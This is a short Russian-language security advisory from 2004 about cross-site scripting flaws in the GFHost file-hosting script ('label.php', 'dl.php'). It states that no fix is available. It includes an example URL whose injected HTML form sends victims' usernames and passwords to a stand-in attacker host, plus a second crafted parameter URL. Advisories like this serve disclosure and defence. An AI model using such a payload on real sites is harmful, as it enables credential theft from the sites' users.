Security Lab

Межсайтовое выполнение сценариев в GFHost

Дата публикации:09.11.2004
Всего просмотров:998
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: GFHost

Описание:
Межсайтовое выполнение сценариев обнаружено в GFHost. Удаленный атакующий может получить доступ к важным данным пользователей.

Уязвимость существует при обработке входных данных в сценариях 'label.php' и 'dl.php'. Удаленный атакующий может специальным образом создать URL и выполнить произвольный HTML код в браузере жертвы. Примеры:

http://[target]/label.php?label=%3Cbody%3E%3Cform%20action=http://www.atacker.com/save.php%20
metho d=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3E%3Cbr%3EPassword:
%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cbr%3E%3Cinput%20name=l ogin%20type=
submit%20value=Login%3E%3C/form%3E%3C/body

http://[target]/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=file.php

URL производителя: gfhost.googlemania.com/gfhost/

Решение: Решение не существует на данный момент.

Ссылки: Multiples XSS vulnerability in Gfhost